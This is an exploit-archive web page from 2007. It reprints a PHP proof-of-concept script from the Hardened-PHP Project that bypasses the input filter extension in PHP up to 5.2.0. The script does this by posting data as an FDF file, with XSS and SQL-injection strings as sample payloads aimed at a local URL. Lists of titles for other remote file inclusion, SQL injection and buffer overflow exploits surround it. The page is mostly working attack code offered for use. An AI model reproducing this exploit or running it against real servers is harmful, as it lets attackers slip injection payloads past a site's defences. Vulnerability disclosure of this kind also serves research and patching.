exploits , vulnerabilities , articles , PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

2007-06-15 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-06-07 Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
2007-06-06 Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
2007-05-24 cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit
2007-05-24 Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit

2007-03-10

PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

Rated as : High Risk

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //            PHP ext/filtet FDF POST Filter Bybass Exploit          
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // _POST is the array that will be sent to the url in $url
  $_POST = array();
  $_POST['var1'] =
"<script>alert(/XSS/);</script>";
  $_POST['var2'] = " ' UNION SELECT ";

  $url = "http://127.0.0.1/info.php";  
  
  // You do not need to change anything below this
  
  $outfdf = fdf_create();
  foreach ($_POST as $key => $value) {
    fdf_set_value($outfdf, $key, $value, 0);
  }
  fdf_save($outfdf, "outtest.fdf");
  fdf_close($outfdf);
  
  $ret = file_get_contents("outtest.fdf");
  unlink("outtest.fdf");
  
  $params = array('http' => array(
      'method' => 'POST',
      'content' => $ret,
      'header' => 'Content-Type: application/vnd.fdf'
  ));
  
  $ctx = stream_context_create($params);
  $fp = @fopen($url, 'rb', false, $ctx);
  if (!$fp) {
    die("Cannot open $url");
  }
  $response = @stream_get_contents($fp); 

  echo $response;
  echo "\n";
?> 
securitydot.net - 2007-03-10

Exploits - newest 10 RSS | More

2007-06-15 38587 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20177 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 24024 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20119 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12396 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10545 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12766 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10610 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22794 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11105 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit